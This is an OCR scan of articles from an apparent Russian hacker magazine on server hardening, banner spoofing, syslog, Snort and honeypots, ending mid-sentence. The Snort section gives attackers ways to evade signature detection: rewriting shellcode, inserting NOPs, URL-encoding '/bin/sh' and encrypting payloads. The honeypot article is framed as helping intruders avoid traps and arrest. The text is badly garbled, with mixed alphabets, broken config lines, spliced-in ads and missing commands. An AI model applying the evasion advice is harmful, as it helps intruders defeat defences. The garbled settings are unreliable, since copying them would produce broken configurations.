ТЮНИНГУЕМ 


СИСТЕМУ 


и Первый шаг - обе- 


зопасить себя встроен- 


Маршрути- 
зация от 
источника - 
механизм, с 
помощью 
которого 
внешний 
хост может 
получить 
информа- 
цию о внут- 
ренних ag- 
ресах сети. 
Механизм 
старый, ма- 
ло где ис- 
пользую- 
щийся, кро- 
ме проблем, 
как прави- 
ло, ничего 
не несет. 


$УМ-флуд - 
переполне- 
ние очереди 
открытых 
соединений 
в состоянии 
SYN-sent. 


Узнать 
конкретную 
версию ка- 
кого-либо 
сервиса не 
из баннера 
значитель- 
но труднее. 


ными средствами. Об- 
щение с ядром будем проводить че- 
рез sysctl - удобный интерфейс для 
тюнинга сетевой подсистемы. Расска- 
жу на примере FreeBSD. В этой систе- 
ме нужно обратить внимание, как ми- 
нимум, на следующие переменные: 


net.inet.tcp.blackhole=2 
net.inet.udp.blackhole=1 


По стандарту, если Ha закрытый 
порт сервера приходит SYN-nakeT, ма- 
шина должна ответить К$Т-пакетом. 
Это упрощает сканирование портов, а 
также дает достаточное количество 
информации (в виде ответов от ска- 
нируемого сервера) для определения 
версии ОС. "Черные дыры" заставля- 
ют FreeBSD быть предельно лаконич- 
ной, не отсылая ничего в ответ на 
запросы к закрытым портам. Идем 
дальше. 

Маршрутизацию от источника мож- 
но смело отключить: 


пе пе р.зоигсегоще=0 
net.inet.ip.accept_sourceroute=0 


Чтобы сервер не стал жертвой DoS- 
атаки, можно включить механизм °уп- 
cookies, который служит для защиты 
сервера от $У№-срлуда. При серьез- 
ной атаке может не менее серьезно 
выручить. Выстави следующую пере- 
менную: 


net.inet.tcp.syncookies=1 


Чтобы затруднить определение вер- 
сии твоей ОС анализом приходящих 
от нее пакетов, изменим значение 
Time To Live: 


net.inet.ip.ttl=64 


Современная система не должна OT- 
вечать на широковещательные пинги, 
но и по сей день существуют сети, ко- 
торые могут стать источником DoS- 
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атаки. Чтобы не попасть в их список, 
выставляем: 


net.inet.icmp.bmcastecho=0 


Если ты хочешь отслеживать коннек- 
ты на закрытые порты твой машины, 
используй следующую переменную: 


net.inet.tcp.log_in_vain=1 


На нагруженном сервере, правда, Te- 
бя может засыпать количеством сооб- 
щений. 

Если не нужна поддержка смешного 
протокола Т/ТСР (TCP for Transactions), 
то пакеты с флагами SYN+FIN можно 
смело отбрасывать как неликвидные :). 
Делается это так: 


net.inet.tcp.drop_synfin=1 


Протокол редко где используется, a 
потому это имеет смысл. 


ОБМАНЫВАЕМ СКАНЕРЫ 

и Вторжение в систему начинается 
со сканирования - это прописная ис- 
тина. Можно (и нужно) уже на этом 
этапе усложнить жизнь злоумыш- 
леннику. Так, пакетный фильтр 
OpenBSD РЕ имеет встроенную воз- 
можность определения и блокирова- 
ния сканеров, используя технологию 
Passive OS Fingerprinting. Достаточно 
добавить правило "block quick from 
any os ММАР" в pf.conf, чтобы pe- 
зультаты работы популярного скане- 
ра птар заставили хакера почесать 
затылок. Также птар'у можно проти- 
водействовать с помощью "Scrub in 
а!" и фильтрации ТСР-пакетов с осо- 
быми флагами, к примеру: 


block return-rst in log quick proto tcp all 
flags FP/FP 

block return-rst in log quick proto tcp all 
flags SE/SE 

block return-rst in log quick proto tcp all 
flags FUP/FUP 


Но можно обойтись и изейапа-сред- 
ствами. Например, утилитой portsen- 
{гу, которая открывает для прослуши- 
вания указанные ТСР/УОР-порты, no- 
гирует обращения к ним и позволяет 
реагировать на сканирование. После 
скачивания с 
http://packetstormsecurity.nl/UNIX/IDS/ и уста- 
новки portsentry правим 
portsentry.conf: 


TCP_PORTS="42,88,135,139,145,389,443,445, 
464,593,636,637,1025,1026,1027,1029,1433,337 
2,3389" 

UDP_PORTS="" 


Я указал набор ТСР-портов, очень 
похожий на тот, что открывает 
Windows 2000 Server в дефолтовой 
установке. УОР-порты прослушивать 
мы не будем - их редко сканируют. 

После этого имеет смысл указать 
хосты, чье сканирование мы будем иг- 
норировать, например, машины из ло- 
калки. Пропиши путь к файлу со спис- 
ком игнорируемых хостов: 


IGNORE_FILE="/usr/local/psionic/portsen- 
try/portsentry.ignore" 


Чтобы portsentry не занималась He- 
нужным отображением IP-agpeca в 
имя хоста, отключи обратный резоль- 
BUHT: 


RESOLVE_HOST = "0" 


Достаточно добавить правило 
“block quick from any os ММАР" в pf.conf, 
чтобы результаты работы популярного 
сканера птар заставили хакера 
почесать затылок. 


Далее блокируем IP-agpeca хостов, с 
которых производится сканирование: 


А теперь укажи, как ты хочешь это де- 
лать. Например, добавлением прави- 
ла фаервола: 


Также можно заносить атакующих в 
hosts.deny для усиления защиты де- 
MOHOB, использующих tcpwrappers: 


Наконец, можно указать баннер, вы- 
даваемый при подключении к порту, 
прослушиваемому portsentry: 


Учти, что блокировать хосты таким 
образом - крайняя мера, так как есть 
возможность превратить network в 
notwork, заблокировав легитимных 
клиентов. В общем случае я бы не ре- 


комендовал использовать 
KILL_ROUTE. У меня уже два с лиш- 
ним года работает машинка, приспо- 
собленная в свое время именно для 
снятия подобной статистики (ради ин- 


МНЕНИЕ ЭКСПЕРТА 


тереса). В настоящее время в 
hosts.deny содержится 12373 записи, и 
помимо злачных притонов интернета 
в черный список попали вполне леги- 
тимные адреса. Сервисы, работающие 
на том сервере, не используют {ср- 
wrappers, так что никто не страдает. 
Но сам факт достоин внимания. 


МЕНЯЕМ БАННЕРЫ 

Любой демон, принимающий 
внешние соединения, так или иначе 
"демонстрирует себя" баннером - Og- 
нострочным приветствием, выдаю- 
щимся клиенту в ответ на соединение 
с ним. Самый простой способ увидеть 
это - совершить соединение telnet'om 
с сервером на порт, прослушиваемый 
демоном: 


Почти всегда это служебная инфор- 
мация, нужная для работы сервиса, 
но иногда - совершенно бесполезная 
и даже вредная. Разные сервисы ве- 
дут себя по-разному: кто-то ограни- 
чивается лаконичным именем хоста 


и типом сервиса (domain.com » 
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ЕЗМТР), а кто-то выдает себя с пот- 
рохами, раскрывая свое имя и вер- 
сию. Если в нашем примере будет 
найдена уязвимость в определенных 
версиях Exchange, то взломщик за 
пару минут напишет баннер-граббер, 
который соединяется с хостами и 
снимает с них версию Exchange. Ta- 
ким нехитрым способом можно легко 
найти уязвимый хост. Теперь понят- 
но, почему смена баннера имеет 
смысл: она позволяет скрыть версию 
сервиса или даже ввести в заблуж- 
дение взломщика. По этой причине 
многие демоны имеют возможность 
считывать баннер прямо из конфига. 
Если же нет - мы в мире OpenSource 
и не поленимся залезть в исходники. 
Учти, смена баннера не даст нам пол- 
ной иллюзии "другого" сервиса. 
Шанс определить демона и, напри- 
мер, отличить Apache от IIS все рав- 
но остается - по поведению прог- 
раммы в ответ на различные запро- 
сы, коду ошибок, специфичных сооб- 
щений, формированию заголовков 
писем (в случае SMTP-cepBepa) и т.п., 
так как жестких стандартов поведе- 
ния того же почтового сервера нет и 
каждый реализует протокол по-свое- 
му. Однако от примитивных механиз- 
мов определения демона мы защи- 
тимся (подробнее про fingerprinting 
читай в другой статье этого номера). 


OpenSSH 

Самый популярный пакет для yga- 
ленного администрирования по про- 
токолу ssh, хоть и написанный весьма 
компетентными хакерами из OpenBSD 
{еат, но имеющий длинную историю 
взломов. Баннер в конориге не выс- 
тавляется, так что будем править сор- 
цы. Найди в файле version.h следую- 
щие строки: 


#define SSH_VERSION "OpenSSH_3.8p1" 


Их и следует изменить. Полностью 
удалять строку не нужно, согласно 
стандарту, сервер обязан выдать вер- 
сию ssh-npoTokona, а затем - имя де- 
мона. Я советую ограничиться удале- 
нием версии openssh, но ты можешь 
проявить фантазию. Затем собирай 
openssh как обычно. 


Apache 

Это классика. Смена баннера самого 
популярного web-cepBepa - весьма 
частое развлечение админов. Здесь 
тоже не обойтись без правки исхосд- 
ных текстов. В каталоге с исходника- 
ми найди файл src/include/httpd.h, а в 
нем - следующие строки: 


#define SERVER_BASEPRODUCT "Apache" 
#define SERVER_BASEREVISION "1.3.29" 


Теперь меняй их Ha Microsoft-llS 4.0 и 
коллекционируй сигнатуры старых 
добрых unicode-atak :). В Apache 2.0.x 
надо править файл 
include/ap_release.h, строки: 
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#define AP_SERVER_BASEPRODUCT 
"Apache" 
#define AP_LSERVER_MAJORVERSION "2" 
#define AP_SERVER_MINORVERSION "0" 
#define AP_LSERVER_PATCHLEVEL "50" 


Postfix 

Этот удобный и (относительно, как и 
все в этом мире) безопасный SMTP- 
сервер позволяет указать баннер 
прямо в конориге, main.cf: 


$smptd_banner = $mydomain ESMTP 
MyCoolServer 


Sendmail 

По умолчанию sendmail выдает 
слишком много информации. В нем 
часто находят уязвимости, так что 
светить версией - себе дороже. Мож- 
но поправить sendmail.cf: 


0 SmtpGreetingMessage=$j ESMTP 
InsecureMailserver 


Или sendmail.mc: 


define( confSMTP_LOGIN_MSG', `$] ESMTP 
UnsecureMailserver') 


BIND 

Named - популярный DNS-cepBep от 
Internet Software Consorcium. Извес- 
тен прежде всего своей историей уяз- 
вимостей, так что рассказать миру о 
том, какая у тебя версия named - зна- 
чит жить как на иголках go следую- 
щей Security Advisory. Правь 
named.conf. В глобальной секции 
options {} пиши: 


version "Microsoft DNS": 


VsFTPd 

Это чрезвычайно безопасный ftp- 
сервер с поддержкой $$|-соединений. 
Указать баннер можно прямо в vsft- 
pd.conf: 


ftpd_banner=mydomain.com Microsoft FTP 
Service (Version 5.0) 


BSD FTPd 

Bo Free/Net/OpenBSD можно попра- 
вить приветствие стандартного ftpd. 
Для этого нужно найти в файле 
/usr/src/libexec/ftpd/ftpd.c строчку: 


reply(220, "Ys FTP server (%s) ready.", 
hostname, version); 


Она может встретиться несколько 
раз, так, BO FreeBSD за баннер отвеча- 
ет конструкция: 


if (hostinfo) 

reply(220, "Ys FTP server (%s) ready.", 
hostname, version); 

else 

reply(220, "FTP server ready."); 


В обоих случаях в выводе строки 
можно написать, что душа пожелает 
(а можно поступить более 31337-но - 
изменить значение hostinfo на O пе- 
ред вышеуказанным блоком if). 

Эти нехитрые трюки, конечно, по- 
могут тебе изменить поведение сер- 
вера, но они не закрывают уязви- 
мостей в сервисах, так что маскиров- 
ка не лишает тебя главной задачи - 
патчить, патчить и еще раз патчить. 
Желаю тебе как можно реже испы- 
тывать в этом необходимость. 


Разные сервисы ведут себя по-разному: кто- 
то ограничивается лаконичным именем 
хоста и типом сервиса (domain.com ESMTP), 
а кто-то выдает себя с потрохами, раскрывая 
свое имя и версию. 
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ПЛАЗМА СЕГОДНЯ son 


e 26 тестов 
a MUGES GCEA живых! видеопроекторов 
B@achi 42P050007T4 u Sony KE-P4aMR=e | oes ent 
за пальму первенств e 13 тестов телевизоров 


Каждый номер с фильмом на DUD 


Смотрите в октябре — 
Фильм Джули Тэймор 
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логи 
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СИСТЕМА LOG-®AMJIOB ДЛЯ *NIX-CACTEM 


ji оги - органы чувств администратора в чреве системы. В этой статье я постараюсь рассказать тебе о работе 
системы ведения [09-файлов, ее грамотной настройке и о том, что из нее вообще можно выжать. 


ТЕОРИЯ 


m При старте системы 


запускается механизм 


Размер 
буфера 
сообщений 
ядра 
содержится 
в файле 
printk.c в 
макросе 
LOG_BUF_L 
EN. 


протоколирования, 
состоящий из двух под- 
систем ведения протокола - ядра и 
процессов. Собственно, работа их 
начнется сразу после того, как syslogd 
и klogd стартанутся в процессе init. 
Тогда создастся сокет /dev/log, Ha ко- 
торый в дальнейшем смогут посту- 
пать логи с удаленных машин, также 
откроются файлы, описанные оля ло- 
гирования в твоей системе. 

С этого момента система будет 
ждать твоих логов. 


KLOGD 

m Сообщения ядра - это He самое 
важное, но упомянуть о них я обязан. 
Ты наверняка встречался с этими со- 
общениями, так как при загрузке сис- 
тема вовсю выводит их на консоль. Их 
можно получить также в любой мо- 
мент с помощью команды dmesg либо 
заглянув в файлы /var/adm/messages 
и /var/adm/syslog, в которых по умол- 
чанию хранится весь протокол ядра. 

Все сообщения от ядра и его Mogy- 
лей хранятся в кольцевом буфере, 
размер которого - 16 Кб по умолча- 
нию. Если размера буфера не хватает 
(к примеру, если ты используешь его 
для вывода отладочных сообщений 
от твоего модуля), то его можно уве- 
личить, подкорректировав сорцы яд- 
ра. Именно за работу с данным 6ycpe- 
ром и отвечает демон Кода, который 
BO многом ПОХОЖ на рассматриваемый 


ниже syslogd (без него он, кстати, да- 
же работать не может). 


SYSLOGD 

m syslogd - демон, отвечающий как 
за протоколирование сообщений про- 
цесса, так и всей системы в целом. 
Процесс, которому надлежит, по за- 
мыслу авторов, протоколировать свои 
данные, должен включать в свое тело 
библиотечные функции, при вызове 
которых происходит обращение к Sys- 
logd и передача тому данных gna за- 
писи (см. врезку). 

Как правило, большая часть демо- 
нов, функционирующих в системе, 
имеет в опциях конфигурации наст- 
ройку параметров подсистемы прото- 
колирования (см. тот же BIND). Co сто- 
роны системы все еще проще. Суще- 
ствует файл (у меня это 
/etc/syslog.conf) - основа для конори- 
гурации всей работы демона syslogd, 
и если что-то надо поменять в прото- 
колировании сообщений системы, то 
именно здесь. 

В принципе, нам никто не мешает ра- 
ботать с логами даже из простого 
приложения. Таким образом, в прото- 
кол можно сбрасывать все действия 
приложения/пользователя, что при- 
менимо для отладки, хотя для отладки 
приложения есть другие и более 
адекватные механизмы. А вот для че- 
го это точно может понадобиться, так 
это для контроля за действиями поль- 
зователя. Своего рода "черный ящик" 
для систем, где действия пользовате- 
лей стоит записывать. 
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НАСТРОЙКА SYSLOG 

ш Для настройки надо понять, что 
есть ряд уровней ("уровней приорите- 
та" или "серьезности") того или иного 
условия, которое протоколируется, и 
ряд типов приложений ("средств"). 
Для каждой конкретной системы они 
описаны в коде ядра. И их значения 
разъяснены в манах. 

"Серьезность" имеет 8 значений (O- 
7), где О - аварийная ситуация, когда 
всем пользователям шлется широко- 
вещательное сообщение и система 
останавливает свою работу. После та- 
кого отказа система, в принципе, мо- 
жет и не завестись. 7 -отладочное 
сообщение (для отладки приложения, 
и не более). Стоит заметить, что ана- 
логичные уровни серьезности ис- 
пользуются и в Cisco IOS. Эта система 
протоколирования очень похожа на 
никсовую. 

"Средства" - это ряд типов процес- 
COB от ядра GO подсистемы почтовых 
сообщений, включая аутентифика- 
цию, авторизацию, демонов etc. 

То есть любая запись в файлы ло- 
гов производится на основании того, 
что процесс хочет записать и с каким 
уровнем серьезности. Система (5уз- 
logd) перехватывает вывод процесса 
и отправляет строку в файл, указан- 
ный в конориге. Как видишь, все 
просто. 

Настраивая демона syslogd через 
/etc/syslog.conf, вполне можно go- 
биться достойной нас информатив- 
НОСТИ. 

Вот пример (кусок реального файла) 
с комментариями: 


#Все, что касаемо аутентификации. 

authpriv.* -/var/log/secure 

#Bce сообщения уровня Emergency (0) 
всем пользователям. 

* етего 

#Писать сообщения от info go warn gna 
сервисов, за исключением 

Заш рим, cron - для этих сервисов есть 
другое место 

#см. первую строку. 

.info;*.!warn;\ 


Обрати внимание: я описываю толь- 
ко то, что есть в моей системе. Один 
из признаков профессионализма ag- 
мина - логи, соответствующие реаль- 
но используемым сервисам. 

Далее. Есть еще горячая парочка 
логов - wtmp и utmp, бинарные cpai- 
лы, и сними нам придется работать 
аккуратно. В них хранится информа- 
ция о подключении пользователей к 
системе. Но есть ряд тонкостей: 

©. utmp хранит данные о подключе- 
нии пользователей в текущий момент 
(см. команду who, к примеру); 

@. wtmp хранит данные обо всех 
подключениях к системе. Если, к при- 
меру, некто вошел в систему и сразу 
вышел, то именно здесь он и "насле- 
дил". Самые свежие записи хранятся 
в начале файла; 

©. если файлов в системе нет, °уз- 
logd их создавать не станет. Самому 
придется создать через touch. Но! Ес- 
ли они были, то где они теперь? 


БЕЗОПАСНОСТЬ 

Во-первых, gO настройки логов оп- 
ределяемся, что и с каких хостов пи- 
сать, так как поги не резиновые и их 
надобно смотреть. Потеряется смысл 
записи, если в них будет куча всякого 
мусора. Необходимо четко понять, что 
писать важно, а что нет. 

К примеру, есть роутер Cisco, есть 
web-cepBep, ЕТР-сервер (на одной 
системе), есть мэйл-сервер и DNS (на 
второй). Знаю, что не по правилам, но 
так уж вышло. 

Также есть тачка админа, который 
для повседневной работы использует 
ту же систему, что и на его серверах. 
Где писать логи? Ответ сам напраши- 
вается: на компьютере админа! Если 
система взломана, то погов хакер на 
ней не найдет! Придется еще и систе- 
му админа ломать :). 

Что писать? Аутентификация - раз, 
подсистемы (FTP, mail ...) - два. Это ми- 
нимум. В данном случае любые попыт- 
ки доступа и/или использования наших 
серверов будут записываться. Получа- 
ем картинку того, что в сети творится. 

Во-вторых (я противник такого мето- 
да, но... он самый надежный), все логи, 
поступающие на машину админа, сле- 
дует немедленно отправлять на пе- 
чать. Даже в случае взлома системы 
админа, при котором все логи, конеч- 


но, будут неизменны, у нас останется 
жесткая копия. Здесь, правда, перед 
нами встает этический вопрос - а сто- 
ит ли весь этот бред жизни деревьев, 
переводимых на бумагу :)? 

Получив логи, отвечающие долж- 
ным требованиям, не стоит забывать 
об их обслуживании. 


ОБСЛУЖИВАНИЕ ЛОГОВ 

Как правило, рекомендации "луч- 
ших собаководов" сводятся к тому, 
что необходимо поставить некий 
софт, отвечающий за работу с лога- 
ми. Все верно. Но это должен быть 
сост, написанный тобой лично. Тут 
поможет Perl, писавшийся, между 
прочим, специально оля этих целей. 

Nor представляет собой некую пос- 
ледовательность дформатированных 
строк, которые удобно просматривать 
программным кодом. 

«Что искать», - спросишь ты? Все 
подозрительное: некорректные входы 
в систему, отказы в аутентификации 
пользователя, строки login/password 
etc. Как пример, многие у/п-пользова- 
тели привыкли к тому, что при входе в 
систему имя пользователя уже введе- 
но и остается только вбить пароль. В 
*nix это He так. В результате, в nore 
вполне могут оказаться актуальные 
пароли, вбитые как имя пользовате- 
ля. Система, конечно же, не пропусти- 
ла, но в лог записала. Если это повто- 
рится, то пора с данным юзером про- 
филактическую беседу проводить. 

Особое внимание стоит уделить поиску 
строк типа /bin/sh. В этом случае, если 
строчка чередуется с "мусором", вполне 


УЧИМСЯ ПИСАТЬ ЛОГИ 


логично предположить, что тебя пыта- 
лись поломать (и ты видишь $Пе!-код). 

Кроме того, при логировании сете- 
вых служб следует искать некоррект- 
ные входы в систему, попытки подбо- 
ра пароля. 

Здесь самое главное - опыт админа. 
Чутье ищейки и знание того, что же 
ты должен увидеть, понимание, как 
тот или иной механизм должен рабо- 
тать. Я подчеркиваю, это важно как 
при конфигурации системы протоко- 
лирования, так и при анализе резуль- 
татов ее работы. 

Логи должны храниться в течение не- 
которого разумного времени (к приме- 
ру, в течение недели). В особенных слу 
чаях можно писать логи на СР и хра- 
нить их столько, сколько нужно. Для 
этих целей есть срича logrotate. Идея 
такова: прописать в /etc/logrotate.conf, 
как и что хранить (пересылать ли на е- 
mail, копировать, сжимать, обрезать 
размер до нуля - см. man logrotate), а 
затем через сгоп раз в какой-то период 
запускать этого хозяйство. Важно то, 
что ты сам можешь настроить меха- 
низм замены логов так, как это нужно. 
К примеру, все отладочные сообщения 
просто и без затей уничтожать, доступ 
к HTTP - хранить и т.д. 

На этом все! Если возникли вопро- 
сы, то читай маны, рой сеть и только 
потом пиши мне :). SH 
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Для програ- 
ммного goc- 
тупа к бу- 
феру ядра 
есть функ- 
ция klogctl, 
которая 
очень похо- 
жа Ha $у$- 
109(). 


Демон $у$- 
109 работа- 
ет на порту 
514/UDP 
(сокет 
/dev/log), 
но можно 
перенапра- 
вить его и 
на иной 
порт через 
фаервол. 


Хранилище 
логов долж- 
но принад- 
лежать 
root'y. 
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IDS/SNORT_) 


IDS/SNORT 


СИСТЕМЫ ОБНАРУЖЕНИЯ ATAK 


рацион :). 


райне важным помощником в админовском деле является IDS, или по-русски система обнаружения атак. С ee 
помощью админы всего мира уже предотвратили огромное число взломов. Пора и тебе включить ее в постоянный 


ТЕОРИЯ 


При анализе атак, 


причем как на реаль- 


SNORT - 
одна из са- 
мых первых 
и наиболее 
удачных ре- 
ализаций 
системы 
IDS. 


ные, работающие систе- 
мы, так и на различные 
OpenHack\honeypot\honeynet (о кото- 
рых ты сможешь прочесть в этом номе- 
ре), были выявлены общие признаки, 
демаскирующие взломщика. И основы- 
ваясь именно на этих признаках, ум- 
ные девелоперы создали первую IDS. 

Системы обнаружения вторжений в 
"чистом виде" бывают двух типов: 

- HIDS (host based intrusion detection 
system) - анализ того, что творится Ha 
хосте. Системы tripware, анализаторы 
log'osB. 

- NIDS (network based intrusion detec- 
tion system) - анализ сетевого Tpacpu- 
ка. Это куда интереснее, HO и слож- 
нее. Дело в том, что такая система ра- 
ботает как сниффер, перехватывая и 


анализируя весь собранный трафик. 
По идее, NIDS должен уметь обнару- 
живать атаки как по сигнатурам, 
встречающимся в перехваченных па- 
кетах, так и по хитрому анализу про- 
токолов. Отличным примером такой 
системы является SNORT, о котором и 
пойдет дальше речь. Снорт седлает 
сетевые интерфейсы и осуществляет 
наблюдение за традриком. Если варуг 
что-то ему кажется подозрительным, 
то он громко “визжит” в логи. Идея 
несложная, правда? 


УСТАНОВКА СВИНЬИ 

Для начала надо понять, где же 
предпочтительнее всего ставить по- 
росячью IDS. Так как наша задача - 
герметизировать сеть или подсети, то 
в достаточной мере очевидным будет 
то, что основное место для установки 
SNORT'ia - роутеры. 

Но помни: вторжение может осущес- 
твляться как извне, так и изнутри се- 
ти. Да, и свои “внутресетевые”, пар- 
дон, дятлы могут "помочь". 

Скачивай Снорта с его официаль- 
ной паги: 

‚ растаривай в каталог, а в нем 
набирай: 


Затем создавай директорию для по- 
росячьих логов: 


SNO 


Теперь Снорт должен быть готов к 
настройке. 

Конфигурировать нужно срайлик 
/etc/snort.conf. Конкретно ты должен 
сделать следующее: 

©. Опиши свою сеть - адреса, ис- 
пользуемые протоколы (порты) и т.п. 
Тем самым ты укажешь, за чем надо 
присматривать. Чем полнее пропи- 
шешь, тем лучше. 

©. Укажи, где и какие брать сигнату- 
ры. В стандартной поставке хряка 
должны быть файлы типа *.rules. Те- 
бе надо указать только те правила, 
которые реально необходимы твоей 
системе (какие сервисы в сети крутят- 
ся, такие *.rules и отбирай). По этим 
сигнатурам будет анализироваться 
трасрик. Все это чем-то напоминает 
работу антивируса, только для ТСРЛР. 
Кстати, когда разберешься, как рабо- 
тает эта IDS, то и сам сможешь созда- 
вать рулесы. 

@. Опиши правила, на основании 
которых анализировать трасбрик, то 
есть какие атаки, с какого интерфейса 
возможны и что делать. Тут также все 
зависит от сервисов и их настроек. 

Настроив, имеем полное право за- 
пустить SNORT: 


2004 
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Но рано радоваться. Увы, старина 
Снорт уязвим. У взломщика есть воз- 
можность (и еще какая!) заставить 
Снорт никак не реагировать на твои 
действия. Если есть правила, то их не 
стоит нарушать, их следует обойти. 
Свинка-то у нас глупенькая, и даже 
если она поймает в свои лапки shell- 
код, но сигнатура его окажется ей не- 
известна, то будет молчать себе свин- 
ка в тряпочку. 

Придется разбираться с *.rules. Есть 
некое свинское правило, 
hellcode.rules зовется. Ты только пос- 
мотри на него: в нем практически все 
мыслимые и несколько немыслимых 
shell-KogoB. Ох-ох-ох, что ж я малень- 
ким не сдох... ;) 


Обойти это правило очень просто. 
Дело в том, что SNORT - это не ан- 
тивирус, и он не обладает эмулято- 
ром кода, который сможет распоз- 
нать Shell-Kog не по сигнатуре, а по 
алгоритму (даешь эвристический 
IDS :)! - прим. AvaLANche'a). Cnego- 
вательно, тебе надо несколько ви- 
доизменить сигнатуру shell-Koga. 
Это можно сделать, просто перепи- 
сав Shell-Kog go неузнаваемости 
под себя. Самый простой способ - 
изменить (но без потери функцио- 
нальности!) порядок следования 
команд или понатыкать NOP'oB (ор- 
код - 90), создав “промежутки” в 
shell-koge. Конечно, при этом вы- 
растет размер кода, но зато его сиг- 
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натура обманет Снорта. Как еще 
можно поменять сигнатуру? 

Ф. Менять одни команды на другие. 
Тут тебе надо очень хорошо ориенти- 
роваться в асме и инструкциях целе- 
вого процессора. По сути дела, нужно 
написать свой shell-Kog, “неизучен- 
ный” Снортом. 

©. Вариант попроще - поменять вы- 
зов шелла. Строка /bin/sh приводит к 
поросячьей активности Снорта и, поз- 
же, админа, а строка %2ZFbIN%2F sh - 
нет. Вот только не всегда это возмож- 
но. Хорошо этот способ работает, как 
правило, на ммеб-сервисах. 

@. Более сложный вариант - приме- 
нение вирусных технологий (правда, 
вирусами тут и не пахнет). Никто не 
забыл о шифрации/дешифрации ис- 
полняемого кода? Можно написать (и 
многие пишут) shell-kog, который бу- 
дет в зашифрованном виде переда- 
ваться жертве, а при запуске рас- 
шифровываться “на лету". Меняя ал- 
горитм шифрования или ключ, мож- 
но будет получать все новые и новые 
сигнатуры, неизвестные ранее этой 
105. Естественно, в сигнатуре будет 
светиться коротенький расшифров- 
щик, но его видоизменить до неузна- 
ваемости не составляет труда (nog- 
робнее о написании shell-KogoB читай 
в августовском Спеце #08.04(45)). 

Таким образом, грамотный взлом- 
щик помнит о SNORT'e и готовит 
эксплоиты собственоручно. Как в ар- 
мии, где есть правило: оружие, обмун- 
дирование и снаряжение каждый го- 
товит себе САМ! 


Снорт ceg- 
лает сете- 
вые интер- 
фейсы и 
осущес- 
твляет наб- 
людение за 
трафиком. 


Основное 


место для 
установки 
Снорта - 
роутеры. 


Снорта 
можно лег- 
ко обойти, 
видоизме- 
нив по мак- 


симуму сиг- 
натуру 
shell-Koga. 
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Крис Касперски aka мыщьх 


ХАКЕРЫ 
ЛЮБЯТ МЕД 


РАЗБИРАЕМСЯ В РАБОТЕ НОМЕУРОТ 


последнее время создаются все более и более изощренные системы борьбы с хакерами, одной из которых является 

honeypot - своеобразный капкан для атакующих. Сколько людей отправилось за решетку с его "помощью"! Даже 
в нашей традиционно лояльной к хакерам стране имеется несколько случаев условных осуждений. Единственный 
выход - задавить идею honeypot'os в зародыше. 


ГОРШОЧЕК МЕДА 


m Однажды некий 


мужчина приобрел су- 


Типичный 
honeypot 
представля- 
ет собой 
грандиоз- 
ный програ- 
ммно-аппа- 
ратный 
комплекс, 
состоящий 
из узла- 
приманки, 
сетевого 
сенсора и 
коллектора. 


Выходить в 
сеть по 
коммутиру- 
емому 90с- 
тупу равно- 
сильно са- 
моубийству, 
в особен- 
ности со 
своего go- 
машнего но- 
мера. 


Архитекту- 
ра honey- 
ро'ов пло- 
хо прорабо- 
тана и уяз- 
вима. 


пернавороченный 
сейф и повсюду хвас- 
тался им: какой он надежный и проч- 
ный. Забравшиеся к нему грабители 
прожгли какой-то хитрой кислотой в 
сейфе дыру и... не обнаружили внут- 
ри ничего! Деньги и драгоценности 
хранились совсем в другом месте, 
взломщиков посадили. 

Подобная тактика широко использу- 
ется и для раскрытия компьютерных 
атак. На видном месте сети устанавли- 
вается заведомо уязвимый сервер, 
надежно изолированный ото всех ос- 
тальных узлов и отслеживающий по- 
пытки несанкционированного проник- 
новения в реальном времени с пере- 
дачей |Р-адреса атакующего в ФСБ 
или подобные ему органы. 

Сервер, играющий роль приманки, 
называется "горшок с медом" ("hon- 
eypot"), а сеть из таких серверов - 
honeynet. 

Противостоять honeypot'am доволь- 
но сложно. Внешне они ничем не от- 
личаются от обычных серверов, но в 
действительности это хорошо замас- 
кированный капкан. Один неверный 
шаг - и хакеру уже ничто не поможет. 
Утверждают, что опытная лиса ухит- 
ряется съесть приманку, не попав в 
капкан. Так чем же мы хуже? 


ВНУТРИ ГОРШКА 

ш Типичный honeypot представляет 
собой грандиозный программно-аппа- 
ратный комплекс, состоящих из сле- 
дующих компонентов: узла-приманки, 
сетевого сенсора и коллектора (нако- 
пителя информации). 

Приманкой может служить любой се- 
вер, запущенный под управлением 
произвольной операционной системы 
и сконфигурированный Ha тот или 
иной уровень безопасности. Изолиро- 
ванность от остальных участков сети 
препятствует использованию сервера- 
приманки как плацдарма для атак на 
основные узлы, однако дает взломщи- 
ку быстро понять, что он на полпути к 
ловушке и отсюда следует немедлен- 
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но ретироваться, заметая следы. Тео- 
ретически администратор может орга- 
низовать подложную локальную сеть, 
практически же это оказывается не- 
подъемно дорогостоящим решением, и 
приходится искать компромисс: либо 
ослабленная изоляция, ограждающая 
только критически важные узлы, либо 
эмулятор локальной сети, запущен- 
ный на одном компьютере. Чаще всего 
узлов с приманкой бывает несколько. 
Одни из них содержат давно извест- 
ные дыры и рассчитаны на начинаю- 
щих хакеров, только-только осваива- 
ющих командую строку и читающих 
книги десятилетней давности. Другие - 


защищены по самые помидоры и ори- 
ентированы на выявление еще неиз- 
вестных атак, совершающихся опыт- 
ными взломщиками. Поэтому, даже об- 
наружив новую дыру, не спеши ло- 
миться на первый же попавшийся сер- 
вер. Ведь, если атака завершится неу- 
дачно, информация об уязвимости по- 
падет в загребущие лапы специалис- 
тов по информационной безопаснос- 
ти, а ты можешь оказаться на скамье 
подсудимых или (что еще хуже) боль- 
ничной койке, считая перебитые реб- 
ра. Кстати говоря, очень многие узлы- 
приманки построены на ОС с настрой- 
ками по умолчанию. И в этом есть 
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Ш Никита Кислицин, редактор рубрики "Взлом" журнала "Хакер": 


"Не стоит думать, что honeypot и honeynet - это что-то экзотичное, 
чрезвычайно редкое и малоэффективное. Это не так. Могу совер- 
шенно определенно сказать, что в ряде сетей популярных российс- 
ких сетевых проектов действуют развернутые сети honeypot, кото- 


рые вылавливают тысячи скрипткидисов в месяц. Хотя иногда по- 
падаются и действительно ценные рыбки - взломщики с приватны- 
ми сплоитами, которые пытаются повалить какой-то сетевой демон 
доселе неизвестным Shell-Kogom. Это является первоочередной 3a- 
дачей подобных систем. Именно поэтому сетевому взломщику 
чрезвычайно важно уметь идентифицировать и определять honey- 
ро{-системы, чтобы не пропалить собственные секреты". 


Блок-схема простейшего honeypot'a 


свой резон. Дыры стандартных кон- 
фигураций хорошо известны, что 
обеспечивает максимальный приток 
атакующих. 

Сетевой сенсор чаще всего реализу- 
ется на базе UNIX-nogo6Hon ОС, a для 
мониторинга информации использу- 
ется утилита tcpdump или ее аналоги. 
В зависимости от консригурации сети 
сенсор может как находиться на 0д- 
